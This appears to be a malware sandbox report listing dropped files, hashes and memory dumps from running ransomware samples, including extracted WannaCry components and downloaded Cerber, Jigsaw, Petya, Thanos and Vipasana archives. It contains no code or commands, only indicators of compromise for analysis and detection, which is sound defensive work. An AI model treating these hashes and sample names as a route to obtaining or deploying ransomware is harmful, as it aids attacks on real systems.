C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
12KB

MD5
82da84d65cbc717ff72cebfe6a63ce77

SHA1
21843387d0cc8f9396b8ce752123a6bdff36f57c

SHA256
ace91d03093e6b5ba5698e9b98f1f6d47fbe23589cc053352f208d8ed7b11d95

SHA512
c9d2d27f636f0a9cf4856e9884c5e3c82d19c34bff7b4ee7b3f338b290b3e047ac4e25e58f3792bfb1af397695f445b1a175997da2a42a1eb594626965c01bca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
12KB

MD5
ea09b945074a9e9d6e12632320198798

SHA1
474e4e8a5e74509103e4685d9e58e76b93542ab9

SHA256
c5c54937d3745d69d8aca4bd54203a8a94a790cf871e8379b508be1699b289fe

SHA512
b26955dab934b3927b7eb3c4e0fec92c47775d8b0fe0982033be831e676c6be830ff102a3d0b5bec9af945cf4092a1c14924ed02d03d685028f8c34e72609e88

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
12KB

MD5
80c21aff13d0e091926329842450426f

SHA1
d809c7ddbe370a13fef5a2d1c0ef36ad2a74f537

SHA256
b095c02c1fdea9f2da1fc744725095cc5511b00f73db23b5cbef9c748ffefc5d

SHA512
0f1f0420065e76ea56a65b69fa15361cca7a40af5e76e7b6be6601e5df62ce2980ffbc1effe538b77934a633ec3a073bf529d43dd3461b7e165b5e17d1cc0800

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
12KB

MD5
02c962e8aeb3a7543392d07cf77a8a8a

SHA1
f15644a1bd85733f7207507dbd4468951cbef86b

SHA256
19e8452fff51fabca7f93a7235ee14400e2b6bfc2e59732d2452f433f5c347b4

SHA512
0939bf697dcb228e86d2671dee9f5a7de2c6dafd6a04fd0b49e607ac641c28965db85ea5ee1c79d29b9f846c1a4460862662d87213c0bc9127449097a3572a1f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
12KB

MD5
3de6fb71979f4963cfff738f266491d6

SHA1
566a65c0c96059c9451c92a4c06fd7f3ae623837

SHA256
fc4594f342544b0c58053d5e7cb0563a79613c26d7bd8495a342a4bc7bacb9ef

SHA512
514a68750f968ff78267a82458418189645e36f3b723610c24083283f5a81eff84d26263e19a2f94c506a34c72f1783e25b91fdc5f111a7b511acabe0fe1b786

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
12KB

MD5
ece578c020e0eec1610d11a3bbd75cd0

SHA1
a877cdfbf13adca18f380403517fcac27134193a

SHA256
86fe38438396a31defb4b419dcefeeb2dc0beeb36bc859680787a6be363e86ea

SHA512
365fcb0429820fbfef7913844d971ee96228f5b6ef4a08926cfa916d250cf9418cab634b9fc6d474221579bcd76eb980f1004ada5c05300949084b2d9e27b34f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
12KB

MD5
2730b41cedba0850a15d24de736eb330

SHA1
380a2497ad16d297278de05a8389f6cda7ba904a

SHA256
56e990fa18c0bc4d2fc44e9804a7ea6f6fbe58794273dd79faa658b4bdce8800

SHA512
16ba9bfa9655821e7673c827d330d834cb8a0f6fa88982f5227672cfff20f789b7c6b03c2df5c8fb4da47309b45ad2a2583b7f447a90916691bc2bceeaceb1ae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\f76ffd0a-4a10-44d4-b93d-1008596924e5.tmp
Filesize
11KB

MD5
2f6d0e4218e3af10b202186a5ffbccba

SHA1
3d418568e9db79a38e3e5a95b22a1e88f3b03ac2

SHA256
a0b35bedba490917b7befb2d1992ddc6a2b4e7046f806b98e1f4a6056ec68a86

SHA512
41625fbf4ca8147dd9bfb13b67b325d2522a775a62971556509232d6108946f107a132b3a71de7f822a3018a37c34639fb2fe7fb29c8a2c6da2d45d35caa2c74

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
Filesize
933B

MD5
f97d2e6f8d820dbd3b66f21137de4f09

SHA1
596799b75b5d60aa9cd45646f68e9c0bd06df252

SHA256
0e5ece918132a2b1a190906e74becb8e4ced36eec9f9d1c70f5da72ac4c6b92a

SHA512
efda21d83464a6a32fdeef93152ffd32a648130754fdd3635f7ff61cc1664f7fc050900f0f871b0ddd3a3846222bf62ab5df8eed42610a76be66fff5f7b4c4c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
Filesize
240KB

MD5
7bf2b57f2a205768755c07f238fb32cc

SHA1
45356a9dd616ed7161a3b9192e2f318d0ab5ad10

SHA256
b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25

SHA512
91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\tor.exe
Filesize
3.0MB

MD5
fe7eb54691ad6e6af77f8a9a0b6de26d

SHA1
53912d33bec3375153b7e4e68b78d66dab62671a

SHA256
e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb

SHA512
8ac6dc5bb016afc869fcbb713f6a14d3692e866b94f4f1ee83b09a7506a8cb58768bd47e081cf6e97b2dacf9f9a6a8ca240d7d20d0b67dbd33238cc861deae8f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\b.wnry
Filesize
1.4MB

MD5
c17170262312f3be7027bc2ca825bf0c

SHA1
f19eceda82973239a1fdc5826bce7691e5dcb4fb

SHA256
d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa

SHA512
c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\c.wnry
Filesize
780B

MD5
383a85eab6ecda319bfddd82416fc6c2

SHA1
2a9324e1d02c3e41582bf5370043d8afeb02ba6f

SHA256
079ce1041cbffe18ff62a2b4a33711eda40f680d0b1d3b551db47e39a6390b21

SHA512
c661e0b3c175d31b365362e52d7b152267a15d59517a4bcc493329be20b23d0e4eb62d1ba80bb96447eeaf91a6901f4b34bf173b4ab6f90d4111ea97c87c1252

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_bulgarian.wnry
Filesize
46KB

MD5
95673b0f968c0f55b32204361940d184

SHA1
81e427d15a1a826b93e91c3d2fa65221c8ca9cff

SHA256
40b37e7b80cf678d7dd302aaf41b88135ade6ddf44d89bdba19cf171564444bd

SHA512
7601f1883edbb4150a9dc17084012323b3bfa66f6d19d3d0355cf82b6a1c9dce475d758da18b6d17a8b321bf6fca20915224dbaedcb3f4d16abfaf7a5fc21b92

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_chinese (simplified).wnry
Filesize
53KB

MD5
0252d45ca21c8e43c9742285c48e91ad

SHA1
5c14551d2736eef3a1c1970cc492206e531703c1

SHA256
845d0e178aeebd6c7e2a2e9697b2bf6cf02028c50c288b3ba88fe2918ea2834a

SHA512
1bfcf6c0e7c977d777f12bd20ac347630999c4d99bd706b40de7ff8f2f52e02560d68093142cc93722095657807a1480ce3fb6a2e000c488550548c497998755

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_chinese (traditional).wnry
Filesize
77KB

MD5
2efc3690d67cd073a9406a25005f7cea

SHA1
52c07f98870eabace6ec370b7eb562751e8067e9

SHA256
5c7f6ad1ec4bc2c8e2c9c126633215daba7de731ac8b12be10ca157417c97f3a

SHA512
0766c58e64d9cda5328e00b86f8482316e944aa2c26523a3c37289e22c34be4b70937033bebdb217f675e40db9fecdce0a0d516f9065a170e28286c2d218487c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_croatian.wnry
Filesize
38KB

MD5
17194003fa70ce477326ce2f6deeb270

SHA1
e325988f68d327743926ea317abb9882f347fa73

SHA256
3f33734b2d34cce83936ce99c3494cd845f1d2c02d7f6da31d42dfc1ca15a171

SHA512
dcf4ccf0b352a8b271827b3b8e181f7d6502ca0f8c9dda3dc6e53441bb4ae6e77b49c9c947cc3ede0bf323f09140a0c068a907f3c23ea2a8495d1ad96820051c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_czech.wnry
Filesize
39KB

MD5
537efeecdfa94cc421e58fd82a58ba9e

SHA1
3609456e16bc16ba447979f3aa69221290ec17d0

SHA256
5afa4753afa048c6d6c39327ce674f27f5f6e5d3f2a060b7a8aed61725481150

SHA512
e007786ffa09ccd5a24e5c6504c8de444929a2faaafad3712367c05615b7e1b0fbf7fbfff7028ed3f832ce226957390d8bf54308870e9ed597948a838da1137b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_danish.wnry
Filesize
36KB

MD5
2c5a3b81d5c4715b7bea01033367fcb5

SHA1
b548b45da8463e17199daafd34c23591f94e82cd

SHA256
a75bb44284b9db8d702692f84909a7e23f21141866adf3db888042e9109a1cb6

SHA512
490c5a892fac801b853c348477b1140755d4c53ca05726ac19d3649af4285c93523393a3667e209c71c80ac06ffd809f62dd69ae65012dcb00445d032f1277b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_dutch.wnry
Filesize
36KB

MD5
7a8d499407c6a647c03c4471a67eaad7

SHA1
d573b6ac8e7e04a05cbbd6b7f6a9842f371d343b

SHA256
2c95bef914da6c50d7bdedec601e589fbb4fda24c4863a7260f4f72bd025799c

SHA512
608ef3ff0a517fe1e70ff41aeb277821565c5a9bee5103aa5e45c68d4763fce507c2a34d810f4cd242d163181f8341d9a69e93fe32aded6fbc7f544c55743f12

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_english.wnry
Filesize
36KB

MD5
fe68c2dc0d2419b38f44d83f2fcf232e

SHA1
6c6e49949957215aa2f3dfb72207d249adf36283

SHA256
26fd072fda6e12f8c2d3292086ef0390785efa2c556e2a88bd4673102af703e5

SHA512
941fa0a1f6a5756ed54260994db6158a7ebeb9e18b5c8ca2f6530c579bc4455918df0b38c609f501ca466b3cc067b40e4b861ad6513373b483b36338ae20a810

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_filipino.wnry
Filesize
36KB

MD5
08b9e69b57e4c9b966664f8e1c27ab09

SHA1
2da1025bbbfb3cd308070765fc0893a48e5a85fa

SHA256
d8489f8c16318e524b45de8b35d7e2c3cd8ed4821c136f12f5ef3c9fc3321324

SHA512
966b5ed68be6b5ccd46e0de1fa868cfe5432d9bf82e1e2f6eb99b2aef3c92f88d96f4f4eec5e16381b9c6db80a68071e7124ca1474d664bdd77e1817ec600cb4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_finnish.wnry
Filesize
37KB

MD5
35c2f97eea8819b1caebd23fee732d8f

SHA1
e354d1cc43d6a39d9732adea5d3b0f57284255d2

SHA256
1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e

SHA512
908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_french.wnry
Filesize
37KB

MD5
4e57113a6bf6b88fdd32782a4a381274

SHA1
0fccbc91f0f94453d91670c6794f71348711061d

SHA256
9bd38110e6523547aed50617ddc77d0920d408faeed2b7a21ab163fda22177bc

SHA512
4f1918a12269c654d44e9d394bc209ef0bc32242be8833a2fba437b879125177e149f56f2fb0c302330dec328139b34982c04b3fefb045612b6cc9f83ec85aa9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_german.wnry
Filesize
36KB

MD5
3d59bbb5553fe03a89f817819540f469

SHA1
26781d4b06ff704800b463d0f1fca3afd923a9fe

SHA256
2adc900fafa9938d85ce53cb793271f37af40cf499bcc454f44975db533f0b61

SHA512
95719ae80589f71209bb3cb953276538040e7111b994d757b0a24283aefe27aadbbe9eef3f1f823ce4cabc1090946d4a2a558607ac6cac6faca5971529b34dac

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jicjixf2.xr4.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\tor\cached-microdescs.new
Filesize
5.6MB

MD5
820a523dff19ae8cb4b7f61fe7f3a9fe

SHA1
2a7e6eed710c51b41686ebc24244d6915c1babd7

SHA256
c091fb84febfac661b0172defee50710e0c122b7f456d989cba45525b7c68f4d

SHA512
17f517e6391920a5a84de5bb3bdd86ce86e1a85474426c910b22a8d95344fec5658a6286ce7a88b32019424c33de454b68133a4f2a6dc39dfd6d1ba2ea656718

Download Submit
C:\Users\Admin\Downloads\Ransomware.Cerber.zip
Filesize
215KB

MD5
5c571c69dd75c30f95fe280ca6c624e9

SHA1
b0610fc5d35478c4b95c450b66d2305155776b56

SHA256
416774bf62d9612d11d561d7e13203a3cbc352382a8e382ade3332e3077e096c

SHA512
8e7b9a4a514506d9b8e0f50cc521f82b5816d4d9c27da65e4245e925ec74ac8f93f8fe006acbab5fcfd4970573b11d7ea049cc79fb14ad12a3ab6383a1c200b2

Download Submit
C:\Users\Admin\Downloads\Ransomware.Jigsaw.zip
Filesize
239KB

MD5
3ad6374a3558149d09d74e6af72344e3

SHA1
e7be9f22578027fc0b6ddb94c09b245ee8ce1620

SHA256
86a391fe7a237f4f17846c53d71e45820411d1a9a6e0c16f22a11ebc491ff9ff

SHA512
21c21b36be200a195bfa648e228c64e52262b06d19d294446b8a544ff1d81f81eb2af74ddbdebc59915168db5dba76d0f0585e83471801d9ee37e59af0620720

Download Submit
C:\Users\Admin\Downloads\Ransomware.Petrwrap.zip
Filesize
1.1MB

MD5
6884a35803f2e795fa4b121f636332b4

SHA1
527bfbf4436f9cce804152200c4808365e6ba8f9

SHA256
cf01329c0463865422caa595de325e5fe3f7fba44aabebaae11a6adfeb78b91c

SHA512
262732a9203e2f3593d45a9b26a1a03cc185a20cf28fad3505e257b960664983d2e4f2b19b9ff743015310bf593810bd049eb03d0fd8912a6d54de739742de60

Download Submit
C:\Users\Admin\Downloads\Ransomware.Petya.zip
Filesize
538KB

MD5
e8fb95ebb7e0db4c68a32947a74b5ff9

SHA1
6f93f85342aa3ea7dcbe69cfb55d48e5027b296c

SHA256
33ca487a65d38bad82dccfa0d076bad071466e4183562d0b1ad1a2e954667fe9

SHA512
a2dea77b0283f4ed987c4de8860a9822bfd030be9c3096cda54f6159a89d461099e58efbc767bb8c04ae21ddd4289da578f8d938d78f30d40f9bca6567087320

Download Submit
C:\Users\Admin\Downloads\Ransomware.Thanos.zip
Filesize
145KB

MD5
00184463f3b071369d60353c692be6f0

SHA1
d3c1e90f39da2997ef4888b54d706b1a1fde642a

SHA256
cd0f55dd00111251cd580c7e7cc1d17448faf27e4ef39818d75ce330628c7787

SHA512
baa931a23ecbcb15dda6a1dc46d65fd74b46ccea8891c48f0822a8a10092b7d4f7ea1dc971946a161ac861f0aa8b99362d5bea960b47b10f8c91e33d1b018006

Download Submit
C:\Users\Admin\Downloads\Ransomware.Thanos.zip:Zone.Identifier
Filesize
55B

MD5
0f98a5550abe0fb880568b1480c96a1c

SHA1
d2ce9f7057b201d31f79f3aee2225d89f36be07d

SHA256
2dfb5f4b33e4cf8237b732c02b1f2b1192ffe4b83114bcf821f489bbf48c6aa1

SHA512
dbc1150d831950684ab37407defac0177b7583da0fe13ee8f8eeb65e8b05d23b357722246888189b4681b97507a4262ece96a1c458c4427a9a41d8ea8d11a2f6

Download Submit
C:\Users\Admin\Downloads\Ransomware.Vipasana.zip
Filesize
638KB

MD5
8d2c4c192772985776bacfd77f7bc4d9

SHA1
3b923b911d443e321e551f26c9588b16a994d52e

SHA256
1733b199a7063443c167e3caeae7dda2315f590341ea2152a9b132e1ad8e94a8

SHA512
6c24f2fe498cf38e3f3d66b62915e6fbc8c2746a1d4c3c3de270f994b02e1369b9540099c12d150712574ececbe63c8c9f28877d8aa4557fbbb7890d5a0de6c1

Download Submit
C:\Users\Admin\Downloads\Ransomware.WannaCry.zip
Filesize
3.3MB

MD5
efe76bf09daba2c594d2bc173d9b5cf0

SHA1
ba5de52939cb809eae10fdbb7fac47095a9599a7

SHA256
707a9f323556179571bc832e34fa592066b1d5f2cac4a7426fe163597e3e618a

SHA512
4a1df71925cf2eb49c38f07c6a95bea17752b025f0114c6fd81bc0841c1d1f2965b5dda1469e454b9e8207c2e0dfd3df0959e57166620ccff86eeeb5cf855029

Download Submit
C:\Users\Admin\Downloads\Ransomware.WannaCry.zip:Zone.Identifier
Filesize
26B

MD5
fbccf14d504b7b2dbcb5a5bda75bd93b

SHA1
d59fc84cdd5217c6cf74785703655f78da6b582b

SHA256
eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

SHA512
aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

Download Submit
C:\Users\Admin\Downloads\Ransomware.WannaCry_Plus.zip
Filesize
2.3MB

MD5
5641d280a62b66943bf2d05a72a972c7

SHA1
c857f1162c316a25eeff6116e249a97b59538585

SHA256
ab14c3f5741c06ad40632447b2fc10662d151afb32066a507aab4ec866ffd488

SHA512
0633bc32fa6d31b4c6f04171002ad5da6bb83571b9766e5c8d81002037b4bc96e86eb059d35cf5ce17a1a75767461ba5ac0a89267c3d0e5ce165719ca2af1752

Download Submit
\??\pipe\LOCAL\crashpad_2800_IANURAIYPWGKAIDP
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/2924-622-0x00000000062E0000-0x000000000632C000-memory.dmp

Filesize
304KB

Download
memory/2924-620-0x0000000005DF0000-0x0000000006147000-memory.dmp

Filesize
3.3MB

Download
memory/2924-609-0x0000000005510000-0x0000000005532000-memory.dmp

Filesize
136KB

Download
memory/2924-607-0x0000000002A80000-0x0000000002AB6000-memory.dmp

Filesize
216KB

Download
memory/2924-608-0x00000000056E0000-0x0000000005D0A000-memory.dmp

Filesize
6.2MB

Download
memory/2924-611-0x0000000005D80000-0x0000000005DE6000-memory.dmp

Filesize
408KB

Download
memory/2924-633-0x00000000067C0000-0x00000000067DA000-memory.dmp

Filesize
104KB

Download
memory/2924-632-0x0000000007B00000-0x000000000817A000-memory.dmp

Filesize
6.5MB

Download
memory/2924-610-0x0000000005D10000-0x0000000005D76000-memory.dmp

Filesize
408KB

Download
memory/2924-621-0x00000000062A0000-0x00000000062BE000-memory.dmp

Filesize
120KB

Download
memory/3124-640-0x000000001E2F0000-0x000000001E342000-memory.dmp

Filesize
328KB

Download
memory/3124-636-0x000000001D5D0000-0x000000001DA9E000-memory.dmp

Filesize
4.8MB

Download
memory/3124-637-0x000000001DB40000-0x000000001DBDC000-memory.dmp

Filesize
624KB

Download
memory/3124-638-0x000000001DC50000-0x000000001DCB2000-memory.dmp

Filesize
392KB

Download
memory/3124-639-0x000000001BF70000-0x000000001BF78000-memory.dmp

Filesize
32KB

Download
memory/3492-2216-0x0000000071380000-0x0000000071402000-memory.dmp

Filesize
520KB

Download
memory/3492-2255-0x0000000000090000-0x000000000038E000-memory.dmp

Filesize
3.0MB

Download
memory/3492-2217-0x0000000071130000-0x0000000071152000-memory.dmp

Filesize
136KB

Download
memory/3492-2218-0x0000000000090000-0x000000000038E000-memory.dmp

Filesize
3.0MB

Download
memory/3492-2215-0x0000000071160000-0x000000007137C000-memory.dmp

Filesize
2.1MB

Download
memory/3492-2256-0x0000000071410000-0x0000000071492000-memory.dmp

Filesize
520KB

Download
memory/3492-2261-0x00000000710B0000-0x0000000071127000-memory.dmp

Filesize
476KB

Download
memory/3492-2260-0x00000000714A0000-0x00000000714BC000-memory.dmp

Filesize
112KB

Download
memory/3492-2259-0x0000000071380000-0x0000000071402000-memory.dmp

Filesize
520KB

Download
memory/3492-2258-0x0000000071160000-0x000000007137C000-memory.dmp

Filesize
2.1MB

Download
memory/3492-2257-0x0000000071130000-0x0000000071152000-memory.dmp

Filesize
136KB

Download
memory/3492-2214-0x0000000071410000-0x0000000071492000-memory.dmp

Filesize
520KB

Download
memory/3492-2265-0x0000000000090000-0x000000000038E000-memory.dmp

Filesize
3.0MB

Download
memory/3492-2272-0x0000000000090000-0x000000000038E000-memory.dmp

Filesize
3.0MB

Download
memory/3492-2294-0x0000000071160000-0x000000007137C000-memory.dmp

Filesize
2.1MB

Download
memory/3492-2291-0x0000000000090000-0x000000000038E000-memory.dmp

Filesize
3.0MB

Download
memory/3492-2329-0x0000000000090000-0x000000000038E000-memory.dmp

Filesize
3.0MB

Download
memory/3492-2338-0x0000000000090000-0x000000000038E000-memory.dmp

Filesize
3.0MB

Download
memory/3492-2341-0x0000000071160000-0x000000007137C000-memory.dmp

Filesize
2.1MB

Download
memory/3492-2349-0x0000000071160000-0x000000007137C000-memory.dmp

Filesize
2.1MB

Download
memory/3492-2346-0x0000000000090000-0x000000000038E000-memory.dmp

Filesize
3.0MB

Download
memory/3492-2354-0x0000000000090000-0x000000000038E000-memory.dmp

Filesize
3.0MB

Download
memory/3492-2357-0x0000000071160000-0x000000007137C000-memory.dmp

Filesize
2.1MB

Download
memory/4616-786-0x0000000010000000-0x0000000010010000-memory.dmp

Filesize
64KB

Download